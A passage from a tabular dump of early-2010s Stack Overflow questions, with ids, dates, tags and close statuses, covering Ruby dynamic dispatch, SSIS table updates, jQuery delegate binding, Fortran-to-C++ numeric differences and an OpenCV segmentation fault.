How should I program this in Ruby === Sorry about the lousy title. I don't know what I should call it. It involves a lot of meta-programming (i think) and that's what I am trying to avoid as much as I can. Here's what I am trying to do: The user enters a string. The string contains 2 parts. An `Event` class and a method in that event and an `Action` class and a method in that action. So the string will look like this: `{EventClass: someMethod=>arg1, arg2, arg3....}, {Action: someMethod=>arg1, arg2, arg3....}`. So a concrete example of this would be: `{TwitterEvent: newTweet=>arg1, arg2, arg3....}, {PersistenceAction: saveToHardDrive=>arg1 arg2...}` So then I will parse this string, instantiate an instance of `TwitterEvent`, call that method on it. Then do the same thing for `PersistenceAction` Has anyone programmed something like this? What the best "design" for this type of application? How would I dynamically instantiate classes from parsed string and then call method? And potentially, the method will have arguments? How would I detect/handle errors? Also, how w Thanks
1
9,064,931
01/30/2012 13:54:04
907,699
08/23/2011 12:20:24
13
0
how to update a table in SQL Server using Integration Services?
I'm trying to update a table in SQL Server with Integration Services, but I don't know how to do that All I have is the set of data that need to be updated (with the same structure of the table that should be updated) Is there some object to do this??
sql-server
ssis
null
null
null
null
open
how to update a table in SQL Server using Integration Services? === I'm trying to update a table in SQL Server with Integration Services, but I don't know how to do that All I have is the set of data that need to be updated (with the same structure of the table that should be updated) Is there some object to do this??
0
6,319,859
06/12/2011 03:01:00
541,686
12/14/2010 08:54:07
15,217
529
What is the '\?' Escape Sequence in D?
What is the [`\?` string escape sequence](http://digitalmars.com/d/2.0/lex.html) in D?
escaping
d
d2
null
null
null
open
What is the '\?' Escape Sequence in D? === What is the [`\?` string escape sequence](http://digitalmars.com/d/2.0/lex.html) in D?
0
5,872,823
05/03/2011 16:44:49
313,421
04/10/2010 10:36:10
1,793
131
Simplifying a boolean logic
I have a function which should return true if all items pass the test. If only one item fails, then the function should return false. Here is the code: private bool TestAll() { bool finalResult = false; bool itemResult = false; foreach (var item in Items) { itemResult = Test(item); if (!finalResult && itemResult) finalResult = true; if (finalResult && !itemResult) finalResult = false; } return finalResult; } How can I simplify the logic into *one* `if` statement using just one `bool` variable?
c#
logic
boolean
null
null
null
open
Simplifying a boolean logic === I have a function which should return true if all items pass the test. If only one item fails, then the function should return false. Here is the code: private bool TestAll() { bool finalResult = false; bool itemResult = false; foreach (var item in Items) { itemResult = Test(item); if (!finalResult && itemResult) finalResult = true; if (finalResult && !itemResult) finalResult = false; } return finalResult; } How can I simplify the logic into *one* `if` statement using just one `bool` variable?
0
7,482,427
09/20/2011 08:47:20
954,347
09/20/2011 08:47:20
1
0
WCF Custom data provider
I am developing a project with wcf . I need to develop a wcf service that will take data from database. I should write it in WCF custom data provider. I can do it with wcf linq and webService with EF. But I can not understand the example of Custom data provider with WCF. Can anyone send me an easy example of wcf custom data provider. My mail is : arca-olcer at hotmail.com
wcf
null
null
null
null
09/20/2011 14:15:32
not a real question
WCF Custom data provider === I am developing a project with wcf . I need to develop a wcf service that will take data from database. I should write it in WCF custom data provider. I can do it with wcf linq and webService with EF. But I can not understand the example of Custom data provider with WCF. Can anyone send me an easy example of wcf custom data provider. My mail is : arca-olcer at hotmail.com
1
10,294,480
04/24/2012 08:39:50
1,343,673
04/19/2012 10:14:20
6
0
Map-overlay balloon close
I am developing an application in which i need to set itemize overlay and ballon popup in google mapview so simply i have just continue with [This][1] and it going good for me.now when i tap on overlayitem, it get balloon with attach data (with help of inflater) now on that inflater file i set one close button wich apear at top of the balloon. so when click on close , balloon will be close. but here i am stuck with event that how can i close this balloon at click event. if it is separate activity then i can defiantly close with simply call finish() method. but here differant matter...so please help me out this... [1]: https://github.com/jgilfelt/android-mapviewballoons
java
android
null
null
null
null
open
Map-overlay balloon close === I am developing an application in which i need to set itemize overlay and ballon popup in google mapview so simply i have just continue with [This][1] and it going good for me.now when i tap on overlayitem, it get balloon with attach data (with help of inflater) now on that inflater file i set one close button wich apear at top of the balloon. so when click on close , balloon will be close. but here i am stuck with event that how can i close this balloon at click event. if it is separate activity then i can defiantly close with simply call finish() method. but here differant matter...so please help me out this... [1]: https://github.com/jgilfelt/android-mapviewballoons
0
1,391,757
09/08/2009 03:05:54
427,855
02/23/2009 06:42:29
35
4
how to play and stop sound control by javascript in wmplayer?
how to play and stop sound control by javascript in wmplayer in asp.net ?
javascript
asp.net
java
null
null
null
open
how to play and stop sound control by javascript in wmplayer? === how to play and stop sound control by javascript in wmplayer in asp.net ?
0
234,734
10/24/2008 18:22:47
9,974
09/15/2008 20:39:27
354
23
Games that teach Programming Fundamentals
Can anybody recommend games that teach programming fundamentals? I've personally found that [Magic: The Gathering][1] and [Robo Rally][2] (both designed by [Richard Garfield][3]) are excellent for developing early programming skills. I used to toy around with Logo on a TRS-80 as a kid and Robo Rally reminds me of that ([here's a similar Flash game][4] that's not bad). MtG is good at stressing creative thinking and learning to see past seemingly obvious situations. [1]: http://www.wizards.com/magic/ [2]: http://www.roborally.com/ [3]: http://en.wikipedia.org/wiki/Richard_Garfield [4]: http://www.newgrounds.com/portal/view/459508
fun
null
null
null
null
12/12/2011 01:24:43
not constructive
Games that teach Programming Fundamentals === Can anybody recommend games that teach programming fundamentals? I've personally found that [Magic: The Gathering][1] and [Robo Rally][2] (both designed by [Richard Garfield][3]) are excellent for developing early programming skills. I used to toy around with Logo on a TRS-80 as a kid and Robo Rally reminds me of that ([here's a similar Flash game][4] that's not bad). MtG is good at stressing creative thinking and learning to see past seemingly obvious situations. [1]: http://www.wizards.com/magic/ [2]: http://www.roborally.com/ [3]: http://en.wikipedia.org/wiki/Richard_Garfield [4]: http://www.newgrounds.com/portal/view/459508
4
10,266,166
04/22/2012 07:48:18
1,302,900
03/30/2012 09:27:34
5
0
Splitting a string of two lines in jquery
In a function, I'm getting a string like `SHOWONLY_Clearance/Closeout (21)`. I want to split this string using '_'. Here is my code `function showResult(resArr) { var substr = resArr.split('_'); alert(substr[0]); alert(substr[1]); }` Its not taking it as a string because it is in two lines. Any help will be appreciated.
javascript
jquery
html
null
null
04/23/2012 11:51:16
not a real question
Splitting a string of two lines in jquery === In a function, I'm getting a string like `SHOWONLY_Clearance/Closeout (21)`. I want to split this string using '_'. Here is my code `function showResult(resArr) { var substr = resArr.split('_'); alert(substr[0]); alert(substr[1]); }` Its not taking it as a string because it is in two lines. Any help will be appreciated.
1
8,463,419
12/11/2011 10:58:16
1,020,476
10/30/2011 07:55:30
154
0
Add Description From Excel File to Columns description in SQL
I have a DB (in SQL Server 2008 SP3) include many tables and each tables have a lot of columns, in other hand I have an Excel file include description for any of my DB's columns, So I am interesting in add this description to description of columns in DB (of course not by hand and one by one), does any one have any idea about this?
sql
sql-server
sql-server-2008
tsql
null
null
open
Add Description From Excel File to Columns description in SQL === I have a DB (in SQL Server 2008 SP3) include many tables and each tables have a lot of columns, in other hand I have an Excel file include description for any of my DB's columns, So I am interesting in add this description to description of columns in DB (of course not by hand and one by one), does any one have any idea about this?
0
9,295,800
02/15/2012 15:06:49
653,827
09/28/2009 10:09:21
20
5
jQuery delegate not firing on dynamically created table
I have the following code that resides in my .js file //This is the row highlighting for the results table $(document).ready(function () { $("table").delegate('td', 'mouseover mouseleave', function (e) { if (e.type == 'mouseover') { $(this).parent().addClass("hover"); } else { $(this).parent().removeClass("hover"); } }); }); It basically adds and removes a style to a table row. This works perfectly for tables that are created are runtime. However for tables that are dynamically created it doesn't do a thing. This is how a table is being created. //This fucntion is called from the homepage, it calls for XML to be passed and renders the table with //Existing enquiries function loadEnqData() { //Display ajax load graphic showLoading('.enqLoading'); //Build results table, ready to receive results. $('.enqResults').append('<table id="enqTable" class="enqTable"><thead><tr><th>' + textlib.get('lblEnqDate') + '</th><th>' + textlib.get('lblEnqUser') + '</th><th>' + textlib.get('lblEnqClientName') + '</th><th>' + textlib.get('lblEnqDetails') + '</th></tr></thead><tbody></tbody></table>'); //URL for XML data var strURL = "enqData.aspx"; if (debug) { $.jGrowl('url= ' + strURL); } //Ajax call $.ajax({ type: "GET", url: strURL, dataType: "xml", timeout: 30000, success: function (xml) { //process XML results for each xml node $(xml).find('row').each(function () { if (debug) { $.jGrowl('Returned id of ' + $(this).attr('id')); } //Set data variables var strEnqID = $.trim($(this).attr('id')); var strEnqDate = $.trim($(this).attr('DateTimeLogged')); var strEnqClient = $.trim($(this).attr('Client_Name')); var strEnqDetails = $.trim($(this).attr('Work_Details')); var strEnqUsername = $.trim($(this).attr('username')); //Add in a data row to the results table. $('#enqTable > tbody:last').append('<tr onclick="selectEnq(\'' + strEnqID + '\');"><td>' + strEnqDate + '</td><td>' + strEnqUsername + '</td><td>' + strEnqClient + '</td><td>' + strEnqDetails + '</td></tr>'); }); //Tidy up $('.enqLoading').empty(); //Enable sorting $(document).ready(function () { $("#enqTable").tablesorter(); } ); //Catch errors }, error: function (XMLHttpRequest, textStatus, errorThrown) { $.jGrowl("Error Please contact IT support - " + XMLHttpRequest.responseText + " " + XMLHttpRequest.status + " " + textStatus + " " + errorThrown, { sticky: true }); } }); } To summarise, this function creates a new table in my enqResults div, runs an ajax query, and adds rows to the tbody of the table with this code $('#enqTable > tbody:last').append Why can delegate not bind to these elements?? Thoughts Thanks SM
jquery
jquery-ajax
null
null
null
null
open
jQuery delegate not firing on dynamically created table === I have the following code that resides in my .js file //This is the row highlighting for the results table $(document).ready(function () { $("table").delegate('td', 'mouseover mouseleave', function (e) { if (e.type == 'mouseover') { $(this).parent().addClass("hover"); } else { $(this).parent().removeClass("hover"); } }); }); It basically adds and removes a style to a table row. This works perfectly for tables that are created are runtime. However for tables that are dynamically created it doesn't do a thing. This is how a table is being created. //This fucntion is called from the homepage, it calls for XML to be passed and renders the table with //Existing enquiries function loadEnqData() { //Display ajax load graphic showLoading('.enqLoading'); //Build results table, ready to receive results. $('.enqResults').append('<table id="enqTable" class="enqTable"><thead><tr><th>' + textlib.get('lblEnqDate') + '</th><th>' + textlib.get('lblEnqUser') + '</th><th>' + textlib.get('lblEnqClientName') + '</th><th>' + textlib.get('lblEnqDetails') + '</th></tr></thead><tbody></tbody></table>'); //URL for XML data var strURL = "enqData.aspx"; if (debug) { $.jGrowl('url= ' + strURL); } //Ajax call $.ajax({ type: "GET", url: strURL, dataType: "xml", timeout: 30000, success: function (xml) { //process XML results for each xml node $(xml).find('row').each(function () { if (debug) { $.jGrowl('Returned id of ' + $(this).attr('id')); } //Set data variables var strEnqID = $.trim($(this).attr('id')); var strEnqDate = $.trim($(this).attr('DateTimeLogged')); var strEnqClient = $.trim($(this).attr('Client_Name')); var strEnqDetails = $.trim($(this).attr('Work_Details')); var strEnqUsername = $.trim($(this).attr('username')); //Add in a data row to the results table. $('#enqTable > tbody:last').append('<tr onclick="selectEnq(\'' + strEnqID + '\');"><td>' + strEnqDate + '</td><td>' + strEnqUsername + '</td><td>' + strEnqClient + '</td><td>' + strEnqDetails + '</td></tr>'); }); //Tidy up $('.enqLoading').empty(); //Enable sorting $(document).ready(function () { $("#enqTable").tablesorter(); } ); //Catch errors }, error: function (XMLHttpRequest, textStatus, errorThrown) { $.jGrowl("Error Please contact IT support - " + XMLHttpRequest.responseText + " " + XMLHttpRequest.status + " " + textStatus + " " + errorThrown, { sticky: true }); } }); } To summarise, this function creates a new table in my enqResults div, runs an ajax query, and adds rows to the tbody of the table with this code $('#enqTable > tbody:last').append Why can delegate not bind to these elements?? Thoughts Thanks SM
0
7,658,911
10/05/2011 09:02:59
261,694
01/29/2010 09:26:52
508
4
Browser based game
I want to develop a very simple browser based game but I do not know where to start except that Javascript or HTML5 is the way forward. I do not know flash. This is the concept of the game: 1. There is two rows. First row contains 5 images and second only one. 2. User drags one of the images from the first row onto the image on the second row. If they match the user get one point, otherwise none. 3. The top row should be horizontally scrollable. How can I do this? What is the best technique / framework for it? Is there any good tutorials that I can read?
javascript
html5
null
null
null
10/05/2011 14:14:56
not a real question
Browser based game === I want to develop a very simple browser based game but I do not know where to start except that Javascript or HTML5 is the way forward. I do not know flash. This is the concept of the game: 1. There is two rows. First row contains 5 images and second only one. 2. User drags one of the images from the first row onto the image on the second row. If they match the user get one point, otherwise none. 3. The top row should be horizontally scrollable. How can I do this? What is the best technique / framework for it? Is there any good tutorials that I can read?
1
5,204,929
03/05/2011 15:59:27
646,113
03/05/2011 15:26:41
1
0
Quick php ajax comment
I am new guy in this site. Please help me with cooments script.. Soo what i need is: http://img846.imageshack.us/i/clipboard01p.jpg/ something like that. When i put mouse on this image shows this baloon bellow. I comment(loads with ajax).. Comment goes to the mysql or text file and of course in that list where was writed. Thats all..
jquery-ajax
null
null
null
null
03/05/2011 20:43:14
not a real question
Quick php ajax comment === I am new guy in this site. Please help me with cooments script.. Soo what i need is: http://img846.imageshack.us/i/clipboard01p.jpg/ something like that. When i put mouse on this image shows this baloon bellow. I comment(loads with ajax).. Comment goes to the mysql or text file and of course in that list where was writed. Thats all..
1
1,183,670
07/26/2009 03:48:46
68,304
02/19/2009 10:15:09
253
19
How to send POST request to some website using winapi?
I'd like to send HTTP POST request to website and retrieve the resultant page using winapi. How can I do that? Thanks i advance.
c
c++
winapi
post
null
null
open
How to send POST request to some website using winapi? === I'd like to send HTTP POST request to website and retrieve the resultant page using winapi. How can I do that? Thanks i advance.
0
6,331,653
06/13/2011 14:17:26
616,233
02/14/2011 13:08:54
3
0
considerable difference in results from c++ and fortran for same calculation
i am translating one FORTRAN program to CUDA. when i translated one subroutine i found that results vary considerably, starting from 3rd digit in the fraction! i've read that they do differ (i've read that it would be very small relatively). i don't know if there's anything wrong in the program. so i compiled the code in C++ too but to get the same result as in CUDA. i am posting both the codes (C++ and FORTRAN). pls check. FORTRAN CODE (ORIGINAL) PROGRAM MAIN IMPLICIT REAL(A-H,O-Z) parameter (nda=3,nda3=nda*3,ND05=3) c INCLUDE 'SIZES' C C CALCULATE LENNARD-JONES POTENTIAL ENERGY DERIVATIVES C COMMON/QPDOT/Q(NDA3),PDOT(NDA3) COMMON/COORS/R(NDA*(NDA+1)/2) COMMON/LENJB/ALJ(ND05),BLJ(ND05),CLJ(ND05),N5J(ND05),N5K(ND05), *NREP(ND05),MREP(ND05),LREP(ND05) DIMENSION JKA(ND05),RNA(ND05),RMB(ND05),RLC(ND05) common/ind/natoms,i3n 831 FORMAT(' NJ=',I4,' NK=',I4,' ALJ=',1PE12.5,' BLJ=',E12.5, *' CLJ=',E12.5,' NREP=',I4,' MREP=',I4,' LREP=',I4) 815 FORMAT(/) read*,natoms read*,nlj i3n=natoms*3 DO 10 I=1,NLJ READ(5,*)N5J(I),N5K(I),NREP(I),MREP(I),LREP(I), * ALJ(I),BLJ(I),CLJ(I) WRITE(6,831)N5J(I),N5K(I),ALJ(I),BLJ(I),CLJ(I), * NREP(I),MREP(I),LREP(I) WRITE(6,815) 10 continue C read(5,*)(q(i),i=1,i3n) do 30 i=1,i3n print*,'q (',i,') = ',q(i) 30 continue DO 40 MN=1,i3n PDOT(MN)=0.0 40 continue IF (NLJ.NE.0) THEN CALL LENJ(1,NLJ) ENDIF end SUBROUTINE LENJ(INL,LNL) IMPLICIT REAL (A-H,O-Z) parameter (nda=3,nda3=nda*3,ND05=3) C CALCULATE LENNARD-JONES POTENTIAL ENERGY DERIVATIVES C COMMON/QPDOT/Q(NDA3),PDOT(NDA3) COMMON/COORS/R(NDA*(NDA+1)/2) COMMON/LENJB/ALJ(ND05),BLJ(ND05),CLJ(ND05),N5J(ND05),N5K(ND05), *NREP(ND05),MREP(ND05),LREP(ND05) DIMENSION JKA(ND05),RNA(ND05),RMB(ND05),RLC(ND05) LOGICAL FIRST DATA FIRST/.TRUE./ save FIRST,JKA,RNA,RMB,RLC common/ind/natoms,i3n IF (FIRST) THEN DO NL=INL,LNL JKA(NL)=ISHFT((N5J(NL)-1)*(2*NATOMS-N5J(NL)),-1)+N5K(NL) * -N5J(NL) RNA(NL)=-NREP(NL)*ALJ(NL) RMB(NL)=-MREP(NL)*BLJ(NL) RLC(NL)=-LREP(NL)*CLJ(NL) ENDDO C FIRST=.FALSE. ENDIF C C CODE FOR GENERAL LENNARD-JONES C DO NL=INL,LNL J3=3*N5J(NL) J2=J3-1 J1=J2-1 K3=3*N5K(NL) K2=K3-1 K1=K2-1 JK=JKA(NL) T1=Q(K1)-Q(J1) T2=Q(K2)-Q(J2) T3=Q(K3)-Q(J3) R(JK)=SQRT(T1*T1+T2*T2+T3*T3) RRJK=1.0/R(JK) DUM1=RNA(NL)*RRJK**(2+NREP(NL)) DUM1=DUM1+RMB(NL)*RRJK**(MREP(NL)+2) DUM1=DUM1+RLC(NL)*RRJK**(LREP(NL)+2) TDUM1=DUM1*T1 TDUM2=DUM1*T2 TDUM3=DUM1*T3 PDOT(K1)=PDOT(K1)+TDUM1 PDOT(K2)=PDOT(K2)+TDUM2 PDOT(K3)=PDOT(K3)+TDUM3 PDOT(J1)=PDOT(J1)-TDUM1 PDOT(J2)=PDOT(J2)-TDUM2 PDOT(J3)=PDOT(J3)-TDUM3 ENDDO print*,'...............' do i=1,i3n print*,'i = ',i ,', dvdq = ',pdot(i) enddo return END C++ CODE #include<iostream> #include<fstream> #include<math.h> #include<stdio.h> #include<stdlib.h> using namespace std; void lenjones(int NATOMS, int* N5J, int* N5K, int* NREP, int* MREP, int* LREP, float* ALJ, float* BLJ, float* CLJ, int NLJ,float* Q, float* PDOT){ size_t NLJF = NLJ*sizeof(float); size_t NLJI = NLJ*sizeof(float); float* RMB = (float*)malloc(NLJF); float* RLC = (float*)malloc(NLJF); float* RNA = (float*)malloc(NLJF); int *JKA=(int*)malloc(NLJI); for (int NL=0; NL < NLJ; NL++){ JKA[NL]= (((N5J[NL]-1)*((2*NATOMS)-N5J[NL]))>> 1) +N5K[NL]-N5J[NL]; RNA[NL]=-NREP[NL]*ALJ[NL]; RMB[NL]=-MREP[NL]*BLJ[NL]; RLC[NL]=-LREP[NL]*CLJ[NL]; } int J3,K3; float T1,T2,T3; float TDUM1,TDUM2,TDUM3,DUM; size_t RRS = (NATOMS*(NATOMS+1)/2)*sizeof(float); float* RR = (float*)malloc(RRS); int JK; for (int NL=0; NL < NLJ; NL++){ J3=(3*N5J[NL])-1; K3=(3*N5K[NL])-1; T1=Q[K3-2]-Q[J3-2]; T2=Q[K3-1]-Q[J3-1]; T3=Q[K3]-Q[J3]; JK=JKA[NL]-1; RR[JK]=sqrtf((T1*T1)+(T2*T2)+(T3*T3)); RR[JK]=1/RR[JK]; DUM=(RNA[NL]*powf(RR[JK],2+NREP[NL])); DUM+=(RMB[NL]*powf(RR[JK],MREP[NL]+2)); DUM+=(RLC[NL]*powf(RR[JK],LREP[NL]+2)); TDUM1=T1*DUM; TDUM2=T2*DUM; TDUM3=T3*DUM; PDOT[K3-2]=PDOT[K3-2]+TDUM1; PDOT[K3-1]=PDOT[K3-1]+TDUM2; PDOT[K3]=PDOT[K3]+TDUM3; PDOT[J3-2]=PDOT[J3-2]-TDUM1; PDOT[J3-1]=PDOT[J3-1]-TDUM2; PDOT[J3]=PDOT[J3]-TDUM3; } } //========================================= int main(){ int NATOMS,NDA3,ND05; scanf("%d %d", &NATOMS, &ND05); printf("\n"); NDA3=3*NATOMS; size_t QPDOT = NDA3*sizeof(float); float* h_Q = (float*)malloc(QPDOT); float* h_PDOT = (float*)malloc(QPDOT); size_t NLJ = ND05*sizeof(float); float* h_ALJ = (float*)malloc(NLJ); float* h_BLJ = (float*)malloc(NLJ); float* h_CLJ = (float*)malloc(NLJ); size_t NLJ_i = ND05*sizeof(int); int* h_LREP = (int*)malloc(NLJ_i); int* h_MREP = (int*)malloc(NLJ_i); int* h_NREP = (int*)malloc(NLJ_i); int* h_N5J = (int*)malloc(NLJ_i); int* h_N5K = (int*)malloc(NLJ_i); int* h_JKA = (int*)malloc(NLJ_i); for (int i=0; i< ND05; i++){ cin >> h_N5J[i] >> h_N5K[i] >> h_NREP[i] >> h_MREP[i] >> h_LREP[i] >> h_ALJ[i] >> h_BLJ[i] >> h_CLJ[i]; } for (int i=0; i<NDA3; i++){ scanf("%f", &h_Q[i]); } for (int i=0; i<NDA3; i++){ h_PDOT[i]=0; } lenjones(NATOMS, &h_N5J[0], &h_N5K[0], &h_NREP[0], &h_MREP[0], &h_LREP[0], &h_ALJ[0], &h_BLJ[0], &h_CLJ[0], ND05, &h_Q[0], &h_PDOT[0]); cout << "i " << "Q[i] " << "PDOT[i]" << endl; for (int i=0; i<NDA3; i++){ printf("%d %e %le \n" , i, h_Q[i], h_PDOT[i]); } }
c++
cuda
fortran
difference
null
06/13/2011 15:54:19
not a real question
considerable difference in results from c++ and fortran for same calculation === i am translating one FORTRAN program to CUDA. when i translated one subroutine i found that results vary considerably, starting from 3rd digit in the fraction! i've read that they do differ (i've read that it would be very small relatively). i don't know if there's anything wrong in the program. so i compiled the code in C++ too but to get the same result as in CUDA. i am posting both the codes (C++ and FORTRAN). pls check. FORTRAN CODE (ORIGINAL) PROGRAM MAIN IMPLICIT REAL(A-H,O-Z) parameter (nda=3,nda3=nda*3,ND05=3) c INCLUDE 'SIZES' C C CALCULATE LENNARD-JONES POTENTIAL ENERGY DERIVATIVES C COMMON/QPDOT/Q(NDA3),PDOT(NDA3) COMMON/COORS/R(NDA*(NDA+1)/2) COMMON/LENJB/ALJ(ND05),BLJ(ND05),CLJ(ND05),N5J(ND05),N5K(ND05), *NREP(ND05),MREP(ND05),LREP(ND05) DIMENSION JKA(ND05),RNA(ND05),RMB(ND05),RLC(ND05) common/ind/natoms,i3n 831 FORMAT(' NJ=',I4,' NK=',I4,' ALJ=',1PE12.5,' BLJ=',E12.5, *' CLJ=',E12.5,' NREP=',I4,' MREP=',I4,' LREP=',I4) 815 FORMAT(/) read*,natoms read*,nlj i3n=natoms*3 DO 10 I=1,NLJ READ(5,*)N5J(I),N5K(I),NREP(I),MREP(I),LREP(I), * ALJ(I),BLJ(I),CLJ(I) WRITE(6,831)N5J(I),N5K(I),ALJ(I),BLJ(I),CLJ(I), * NREP(I),MREP(I),LREP(I) WRITE(6,815) 10 continue C read(5,*)(q(i),i=1,i3n) do 30 i=1,i3n print*,'q (',i,') = ',q(i) 30 continue DO 40 MN=1,i3n PDOT(MN)=0.0 40 continue IF (NLJ.NE.0) THEN CALL LENJ(1,NLJ) ENDIF end SUBROUTINE LENJ(INL,LNL) IMPLICIT REAL (A-H,O-Z) parameter (nda=3,nda3=nda*3,ND05=3) C CALCULATE LENNARD-JONES POTENTIAL ENERGY DERIVATIVES C COMMON/QPDOT/Q(NDA3),PDOT(NDA3) COMMON/COORS/R(NDA*(NDA+1)/2) COMMON/LENJB/ALJ(ND05),BLJ(ND05),CLJ(ND05),N5J(ND05),N5K(ND05), *NREP(ND05),MREP(ND05),LREP(ND05) DIMENSION JKA(ND05),RNA(ND05),RMB(ND05),RLC(ND05) LOGICAL FIRST DATA FIRST/.TRUE./ save FIRST,JKA,RNA,RMB,RLC common/ind/natoms,i3n IF (FIRST) THEN DO NL=INL,LNL JKA(NL)=ISHFT((N5J(NL)-1)*(2*NATOMS-N5J(NL)),-1)+N5K(NL) * -N5J(NL) RNA(NL)=-NREP(NL)*ALJ(NL) RMB(NL)=-MREP(NL)*BLJ(NL) RLC(NL)=-LREP(NL)*CLJ(NL) ENDDO C FIRST=.FALSE. ENDIF C C CODE FOR GENERAL LENNARD-JONES C DO NL=INL,LNL J3=3*N5J(NL) J2=J3-1 J1=J2-1 K3=3*N5K(NL) K2=K3-1 K1=K2-1 JK=JKA(NL) T1=Q(K1)-Q(J1) T2=Q(K2)-Q(J2) T3=Q(K3)-Q(J3) R(JK)=SQRT(T1*T1+T2*T2+T3*T3) RRJK=1.0/R(JK) DUM1=RNA(NL)*RRJK**(2+NREP(NL)) DUM1=DUM1+RMB(NL)*RRJK**(MREP(NL)+2) DUM1=DUM1+RLC(NL)*RRJK**(LREP(NL)+2) TDUM1=DUM1*T1 TDUM2=DUM1*T2 TDUM3=DUM1*T3 PDOT(K1)=PDOT(K1)+TDUM1 PDOT(K2)=PDOT(K2)+TDUM2 PDOT(K3)=PDOT(K3)+TDUM3 PDOT(J1)=PDOT(J1)-TDUM1 PDOT(J2)=PDOT(J2)-TDUM2 PDOT(J3)=PDOT(J3)-TDUM3 ENDDO print*,'...............' do i=1,i3n print*,'i = ',i ,', dvdq = ',pdot(i) enddo return END C++ CODE #include<iostream> #include<fstream> #include<math.h> #include<stdio.h> #include<stdlib.h> using namespace std; void lenjones(int NATOMS, int* N5J, int* N5K, int* NREP, int* MREP, int* LREP, float* ALJ, float* BLJ, float* CLJ, int NLJ,float* Q, float* PDOT){ size_t NLJF = NLJ*sizeof(float); size_t NLJI = NLJ*sizeof(float); float* RMB = (float*)malloc(NLJF); float* RLC = (float*)malloc(NLJF); float* RNA = (float*)malloc(NLJF); int *JKA=(int*)malloc(NLJI); for (int NL=0; NL < NLJ; NL++){ JKA[NL]= (((N5J[NL]-1)*((2*NATOMS)-N5J[NL]))>> 1) +N5K[NL]-N5J[NL]; RNA[NL]=-NREP[NL]*ALJ[NL]; RMB[NL]=-MREP[NL]*BLJ[NL]; RLC[NL]=-LREP[NL]*CLJ[NL]; } int J3,K3; float T1,T2,T3; float TDUM1,TDUM2,TDUM3,DUM; size_t RRS = (NATOMS*(NATOMS+1)/2)*sizeof(float); float* RR = (float*)malloc(RRS); int JK; for (int NL=0; NL < NLJ; NL++){ J3=(3*N5J[NL])-1; K3=(3*N5K[NL])-1; T1=Q[K3-2]-Q[J3-2]; T2=Q[K3-1]-Q[J3-1]; T3=Q[K3]-Q[J3]; JK=JKA[NL]-1; RR[JK]=sqrtf((T1*T1)+(T2*T2)+(T3*T3)); RR[JK]=1/RR[JK]; DUM=(RNA[NL]*powf(RR[JK],2+NREP[NL])); DUM+=(RMB[NL]*powf(RR[JK],MREP[NL]+2)); DUM+=(RLC[NL]*powf(RR[JK],LREP[NL]+2)); TDUM1=T1*DUM; TDUM2=T2*DUM; TDUM3=T3*DUM; PDOT[K3-2]=PDOT[K3-2]+TDUM1; PDOT[K3-1]=PDOT[K3-1]+TDUM2; PDOT[K3]=PDOT[K3]+TDUM3; PDOT[J3-2]=PDOT[J3-2]-TDUM1; PDOT[J3-1]=PDOT[J3-1]-TDUM2; PDOT[J3]=PDOT[J3]-TDUM3; } } //========================================= int main(){ int NATOMS,NDA3,ND05; scanf("%d %d", &NATOMS, &ND05); printf("\n"); NDA3=3*NATOMS; size_t QPDOT = NDA3*sizeof(float); float* h_Q = (float*)malloc(QPDOT); float* h_PDOT = (float*)malloc(QPDOT); size_t NLJ = ND05*sizeof(float); float* h_ALJ = (float*)malloc(NLJ); float* h_BLJ = (float*)malloc(NLJ); float* h_CLJ = (float*)malloc(NLJ); size_t NLJ_i = ND05*sizeof(int); int* h_LREP = (int*)malloc(NLJ_i); int* h_MREP = (int*)malloc(NLJ_i); int* h_NREP = (int*)malloc(NLJ_i); int* h_N5J = (int*)malloc(NLJ_i); int* h_N5K = (int*)malloc(NLJ_i); int* h_JKA = (int*)malloc(NLJ_i); for (int i=0; i< ND05; i++){ cin >> h_N5J[i] >> h_N5K[i] >> h_NREP[i] >> h_MREP[i] >> h_LREP[i] >> h_ALJ[i] >> h_BLJ[i] >> h_CLJ[i]; } for (int i=0; i<NDA3; i++){ scanf("%f", &h_Q[i]); } for (int i=0; i<NDA3; i++){ h_PDOT[i]=0; } lenjones(NATOMS, &h_N5J[0], &h_N5K[0], &h_NREP[0], &h_MREP[0], &h_LREP[0], &h_ALJ[0], &h_BLJ[0], &h_CLJ[0], ND05, &h_Q[0], &h_PDOT[0]); cout << "i " << "Q[i] " << "PDOT[i]" << endl; for (int i=0; i<NDA3; i++){ printf("%d %e %le \n" , i, h_Q[i], h_PDOT[i]); } }
1
10,380,446
04/30/2012 08:14:36
1,076,455
12/01/2011 22:59:29
1
0
Segmentation faults
I am writing this bit of code for fingertip detection using openNi and OpenCV and I keep getting Segmentation Faults when I run the code. I have been looking at it for days and I don't know what I can do to correct the fault. Any help would be much appreciated. The code is on [pastebin][1] and the error I get in gdb is below. Program received signal SIGSEGV, Segmentation fault. *__GI___libc_free (mem=0xff0000ff0000ff00) at malloc.c:3710 3710 malloc.c: No such file or directory. in malloc.c Current language: auto The current source language is "auto; currently c". (gdb) bt #0 *__GI___libc_free (mem=0xff0000ff0000ff00) at malloc.c:3710 #1 0x000000000040416b in cv::Mat::release (this=0x7fffffffb5f0) at /usr/local/include/opencv2/core/mat.hpp:382 #2 0x0000000000404058 in ~Mat (this=0x7fffffffb5f0, __in_chrg=<value optimized out>) at /usr/local/include/opencv2/core/mat.hpp:295 #3 0x0000000000405efd in Hands::findFingers (pPosition=0x7fffffffbfb0, depth=...) at Hands.cpp:358 #4 0x00000000004045c9 in Hands::Hand_Update (generator=..., nId=5, pPosition=0x7fffffffbfb0, fTime=27.3294144, pCookie=0x7fffffffdfc0) at Hands.cpp:60 #5 0x0000000000406cfe in xn::HandsGenerator::HandUpdateCB (hNode=0x10c94c0, user=5, pPosition=0x7fffffffbfb0, fTime=27.3294144, pCookie=0xe81d90) at ../OpenNI/Platform/Linux/Redist/OpenNI-Bin-Dev-Linux-x64-v1.5.2.23/Include/XnCppWrapper.h:4044 #6 0x00007fffe7522468 in XnVTrackerExistingHandEvent::Raise(unsigned int, XnVector3D const*, float) () from /usr/lib/libXnVHandGenerator_1_5_2.so #7 0x00007fffe7520ab4 in XnVTracker::UpdatePoint(unsigned int, XnVector3D const&, float) () from /usr/lib/libXnVHandGenerator_1_5_2.so #8 0x00007fffe7521225 in XnVTracker::ProcessEvent(NAEvent const&) () from /usr/lib/libXnVHandGenerator_1_5_2.so #9 0x00007fffe756f817 in NHAHandTrackerManager::SendHandMovedEvent(NHAHandTracker const&, unsigned int, SensorTime) () ---Type <return> to continue, or q <return> to quit--- from /usr/lib/libXnVHandGenerator_1_5_2.so #10 0x00007fffe756feab in 